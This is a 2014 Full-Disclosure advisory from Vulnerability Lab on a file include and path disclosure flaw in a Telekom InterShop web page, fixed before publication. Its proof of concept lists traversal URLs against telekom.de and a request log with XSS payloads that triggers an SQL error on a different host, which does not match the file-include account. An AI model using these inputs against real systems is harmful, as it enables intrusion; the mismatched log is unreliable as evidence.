[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Telekom Bug Bounty #12 - File Include Web Vulnerability
From: Vulnerability Lab <admin () vulnerability-lab ! com>
Date: 2014-02-27 11:10:36
Message-ID: 530F1D2C.3010408 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Telekom Bug Bounty #12 - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1178
Release Date:
=============
2014-02-27
Vulnerability Laboratory ID (VL-ID):
====================================
1178
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
Deutsche Telekom AG (English: German Telecom) is a German telecommunications company \
headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as \
the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German \
government still holds a 15% stake in company stock directly, and another 17% through the \
government bank KfW.
(Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & \
http://www.telekom.com/bug-bounty )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a file include web vulnerability in an \
official German Telekom website web-application.
Vulnerability Disclosure Timeline:
==================================
2014-01-01: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2014-01-03: Vendor Notification (Telekom CERT Security Team)
2014-01-16: Vendor Response/Feedback (Telekom CERT Security Team)
2014-02-20: Vendor Fix/Patch (Telekom Developer Team)
2014-02-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Deutsche Telekom (German Telecom)
Product: InterShop - Web Application (Framework) 2014 Q1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file/path include and arbitrary file upload vulnerability has been discovered in the \
official Telekom GT INTERSHOP website web-application. The arbitrary file upload issue and file \
include web vulnerability allows attackers to unauthorized include/request/access or upload own \
files/ context.
The local file include and arbitrary file upload web vulnerability is located in the vulnerable \
parameter `filelist` of the file `ViewStaticContent-Start`. Remote attackers, if they know the \
main correct path, can view the source code of any file on the system. The issue has the \
character of a file include but also an arbitrary file upload issue. The security risk of the \
arbitrary file upload and local file include web vulnerability is estimated as high with a \
cvss (common vulnerability scoring system) count of 7.1(+).
Exploitation of the local file include and arbitrary file upload web vulnerability requires no \
user interaction or privileged web user account. Successful exploitation of the local web \
vulnerability results in web-application compromise by unauthorized local file include web \
attacks.
Vulnerable Parameter(s):
[+] filelist
Affected Module(s):
[+] ViewStaticContent-Start
Proof of Concept (PoC):
=======================
The local file include and arbitrary file include web vulnerability can be exploited by remote \
attackers without user interaction or privileged user account. For security demonstration or to \
reproduce the web vulnerability follow the provided information and steps below.
1) By visiting: https://www.telekom.de/is-bin/INTERSHOP.enfinity/WFS/EKI-PK-Site/de_DE/-/EUR/ViewStaticContent-Start
?filelist=css/default/process/process_apds.css&filetype=js
2) we will notice the source code of the css file
3) if we changes the file type from js to css
4) the link will become:
https://www.telekom.de/is-bin/INTERSHOP.enfinity/WFS/EKI-PK-Site/de_DE/-/EUR/ViewStaticContent-Start
?filelist=css/default/process/process_apds.css&filetype=css
5) We will notice that the paths of the different files in the css file have been changed from \
relative paths to absolute paths in the frst link the path of the images was similar to this:
background: url(../../../images/symbols/BG_APDS_tarif_grau.gif) no-repeat;
After changing the "filetype" parameter from js to css, the path has became:
background: url(/is-bin/intershop.static/WFS/EKI-PK-Site/EKI-PK/de_DE/images/symbols/BG_APDS_tarif_grau.gif) \
no-repeat;
we see that the paths changed from relative paths to absolute ones which considered as path \
disclosure vulnerability
To include a file for example the following image:
../../../images/symbols/BG_APDS_tarif_grau.gif
we can change the vulnerable link to be:
https://www.telekom.de/is-bin/INTERSHOP.enfinity/WFS/EKI-PK-Site/de_DE/-/EUR/ViewStaticContent-Start?filelist=images/symbols/BG_APDS_tarif_grau.gif&filetype=css
Another way to include the same image is:
https://www.telekom.de/is-bin/INTERSHOP.enfinity/WFS/EKI-PK-Site/de_DE/-/EUR/ViewStaticContent-Start
?filelist=../de_DE/images/symbols/BG_APDS_tarif_grau.gif&filetype=css
In this link we go back one folder and then we go inside the folder again. The folder name is \
"de_DE" which we got from the path disclosure vulnerability
--- PoC Session Logs ---
//The Send request
POST /englishtest2004/test.asp
HTTP/1.1
Host: gt.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm
Cookie:
_ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK
Connection:
keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:
482
response=%2Fenglishtest2004%2Fhtml%2Fstarttest.htm&to=hans-juergen.grunwald%40telekom.de&from=
&subject=Fokus_Sprachen_%26_Seminare-Login&smtphost=localhost&mailbody='&NAME=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&VORNAME=
%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&PLZ=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&EMAIL=%22%3E%3Cimg+src%3Dx+
onerror%3Dalert%281%29%3E&TELEFON=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ORT=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
//Response
HTTP/1.1 500 Internal Server Error
Date: Thu, 02 Jan 2014 03:49:47 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 572
Content-Type: text/html
Cache-control: private
insert into Sprachtest(Name, Vorname,PersNr,Telefon,Fax, Ergebnis)VALUES
('"><img src=x onerror=alert(1)>','"><img src=x onerror=alert(1)>','','"><img src=x onerror ',' \
','''); <font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>
error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Kein
schließendes Anführungszeichen nach der Zeichenfolge '');'.</font>
<p>
<font face="Arial" size=2>
/englishtest2004/test.asp</font><font face="Arial" size=2>, line 23</font>
Picture(s):
../1.png
../2.png
../3.png
Resource(s):
../poc-session-results.txt
Solution - Fix & Patch:
=======================
The local file include web vulnerability can be patched by a secure filter restriction and \
encode to parse the vulnerable filelist parameter. Ensure the back request of the filetype to \
the css is secure and make a proof to validate.
2014-02-20: Vendor Fix/Patch (Telekom Developer Team)
Security Risk:
==============
The security risk of the local file include web vulnerability is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed (ibrahim@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY ADMINISTRATION
DOMAIN: www.vulnerability-lab.com
CONTACT: admin@vulnerability-lab.com
PHONE: +4915776363337 (DE)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic